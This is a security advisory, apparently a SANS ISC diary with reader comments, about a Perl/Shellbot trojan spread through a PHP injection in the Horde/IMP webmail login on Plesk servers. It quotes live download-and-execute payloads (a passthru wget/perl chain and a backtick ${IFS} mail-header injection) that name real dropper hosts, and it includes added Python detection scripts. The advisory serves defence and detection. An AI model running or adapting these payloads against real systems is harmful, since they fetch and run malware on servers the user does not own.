Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)

ISC received a submission from Zach of a Perl/Shellbot.B trojan served from fallencrafts[.]info/download/himad.png [1]. The trojan has limited detection on VirusTotal [2]; the script contains a “hostauth” of sosick[.]net [3], and the IRC server the compromised systems connect to is located at 89.248.172.144. From what we have so far, it appears to be exploiting older versions of Plesk.

Update

This bot exploits a vulnerability in Horde/IMP, the webmail bundled with Plesk [4], and possibly others. You may want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info, and for connection attempts from 93.174.88.125 [6], an address for which a lot of activity has been reported to DShield over the past 3 days. The Horde log entry below shows the injection attempt:

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely to see Apache processes similar to these:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png
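The two indicators above (a Horde/IMP failed-login entry whose login name carries PHP code, and a web-server account running a fetch-and-execute chain out of /var/tmp) are easy to sweep for across a fleet. The script below is an added example, not part of the diary and not Plesk or Horde code; the log lines and process rows it scans are constructed to mirror the diary's samples, with a placeholder dropper host and RFC 5737 test addresses.

```python
"""Added detection example (not from the ISC diary, Horde or Parallels): flag
Horde/IMP failed-login log entries whose login name contains PHP code, and
`ps aux` rows where the web-server account runs a download-and-execute chain.
All sample lines below are constructed; dropper.example is a placeholder host."""
import re

# Horde/IMP logs the attempted login name verbatim; a legitimate IMAP login
# never contains a PHP open tag or a command-execution function.
FAILED_LOGIN = re.compile(
    r"FAILED LOGIN\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s.*?\sas\s+(?P<login>.*?)\s+\[on line"
)
PHP_EXEC = re.compile(r"<\?php|\b(?:passthru|system|exec|shell_exec|popen)\s*\(", re.I)

# Accounts the web server runs as; they have no business fetching and running scripts.
WEB_USERS = {"apache", "www-data", "nobody"}
# Full chain seen in the diary: cd into a world-writable dir, fetch, run with perl.
DROPPER_CHAIN = re.compile(r"cd\s+/(?:var/)?tmp\b.*\b(?:wget|curl)\b.*\bperl\b")
# Any bare downloader, interpreter or `sh -c` started directly by the web user.
FETCH_OR_INTERP = re.compile(r"^(?:wget|curl|perl|python|sh\s+-c)\b")

# Constructed Horde log lines: one injection attempt, one ordinary bad password.
HORDE_LOG = [
    'Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 198.51.100.7 to localhost:143[imap/notls] '
    'as <?php passthru("cd /var/tmp;wget http://dropper.example/himad.png;perl himad.png;'
    'rm -rf himad.png*"); ?>@victim.example [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
    'Oct 26 12:01:10 HORDE [error] [imp] FAILED LOGIN 203.0.113.9 to localhost:143[imap/notls] '
    'as alice@victim.example [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
]

# Constructed `ps aux` rows: the dropper chain, its wget child, and two benign processes.
PS_AUX = [
    "apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;"
    "wget http://dropper.example/himad.png;perl himad.png;rm -rf himad.png*",
    "apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://dropper.example/himad.png",
    "apache    9901  0.0  0.3 301200 12000 ?        S    10:00   0:02 /usr/sbin/httpd -DFOREGROUND",
    "root         1  0.0  0.1  19300  1500 ?        Ss   09:00   0:01 /sbin/init",
]


def scan_horde_log(lines):
    """Return [{'ip', 'login'}] for failed logins whose login name carries PHP code."""
    hits = []
    for line in lines:
        m = FAILED_LOGIN.search(line)
        if m and PHP_EXEC.search(m.group("login")):
            hits.append({"ip": m.group("ip"), "login": m.group("login")})
    return hits


def scan_ps(lines):
    """Return [(pid, command)] for suspicious processes owned by a web-server account.

    Expects `ps aux` rows: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND.
    """
    hits = []
    for line in lines:
        fields = line.split(None, 10)          # COMMAND keeps its internal spaces
        if len(fields) < 11 or fields[0] not in WEB_USERS:
            continue
        pid, cmd = fields[1], fields[10]
        if DROPPER_CHAIN.search(cmd) or FETCH_OR_INTERP.match(cmd):
            hits.append((pid, cmd))
    return hits


if __name__ == "__main__":
    for hit in scan_horde_log(HORDE_LOG):
        print("injection attempt from", hit["ip"], "login:", hit["login"][:60])
    for pid, cmd in scan_ps(PS_AUX):
        print("suspicious web-user process", pid, cmd[:60])
```

In practice the Horde scanner is pointed at the Horde/IMP log and the process scanner at `ps aux` output; a hit from the first means the webmail login form was probed with PHP in the username, and a hit from the second means the injection succeeded and the dropper ran, at which point the host should be treated as compromised rather than cleaned by killing the processes.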

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Comments

I received an interesting attempt to infect my mail server with the Shellbot Trojan. The command to download and execute the trojan is sent as the subject line and as the reply-to.

I have no idea how that command is supposed to be executed; at least my Postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail because it was identified as spam and redirected), the intended target is not the mail client.

Find attached the mail including headers (two header lines with only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
by mail.######.de (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
MISSING_DATE=1.36, MISSING_HEADERS=1.021, MISSING_MID=0.497,
MISSING_SUBJECT=1.799, RDNS_NONE=0.793, TO_NO_BRKTS_NORDNS=0.001]
autolearn=no
Received: from mail.######.de ([127.0.0.1])
by localhost (mail.######.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [1.234.45.84])
by mail.######.de (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.6E6AB482E1@mail.######.de>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com

x
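The sender addresses in the mail above embed backtick command substitution with `${IFS}` standing in for spaces, which only does damage if some mail-handling script interpolates a header value into a shell command. The script below is an added example, not the commenter's code: it parses a raw message with the standard library and flags watched headers that contain shell substitution syntax. The message is constructed to mirror the one posted, with placeholder domain, IP and queue IDs.

```python
"""Added example (not part of the comment above): parse a raw mail and flag
sender/subject headers that embed shell command substitution. The message is
constructed; example.invalid, 192.0.2.10 and the queue IDs are placeholders."""
import email
import re

# Headers that mail-processing scripts most often hand to a shell or a log line.
WATCHED = ("Return-Path", "From", "Reply-To", "Subject", "To")

# Backticks and $( ) run a command; ${IFS} expands to a field separator, so the
# payload survives address checks that would reject a literal space.
SHELL_SUBST = re.compile(r"`[^`]*`|\$\(|\$\{IFS\}|\$IFS\b")

# Constructed message modelled on the posted headers (payload host is a placeholder).
SAMPLE = """Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}192.0.2.10/user.pl``perl${IFS}/tmp/p.pl`@example.invalid>
Received: from domain.local (unknown [192.0.2.10])
    by mail.example.invalid (Postfix) with ESMTP id PLACEHOLDER1
    for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.PLACEHOLDER2@mail.example.invalid>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}192.0.2.10/user.pl``perl${IFS}/tmp/p.pl`@example.invalid

(empty body)
"""

# Constructed benign message: a dollar sign alone must not trigger.
BENIGN = """From: alice@example.invalid
To: postmaster@localhost
Subject: Meeting notes for Monday ($5 budget)

hi
"""


def find_shell_injection(raw):
    """Return [(header, value)] for watched headers containing shell substitution."""
    msg = email.message_from_string(raw)
    findings = []
    for name in WATCHED:
        for value in msg.get_all(name, []):    # header lookup is case-insensitive
            if SHELL_SUBST.search(str(value)):
                findings.append((name, str(value)))
    return findings


if __name__ == "__main__":
    for header, value in find_shell_injection(SAMPLE):
        print(f"{header}: shell substitution in header value: {value}")
    print("benign findings:", find_shell_injection(BENIGN))
```

The mitigation side is the same regardless of the detection: code that acts on header values should never build a shell command string from them; calling the external program with an argument list (`subprocess.run([...])` without `shell=True`) leaves backticks and `${IFS}` as inert characters.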
The way that this is happening is through the Plesk vulnerability in the above article. It may affect more than just Plesk-related systems, but all systems using Horde. They can execute it via the login screen. Take a look at this: http://kb.parallels.com/en/113374. I've dealt a lot with these; if you need more assistance with this particular issue, you can always email me directly at kestrel@trylinux.us or zwikholm@cari.net
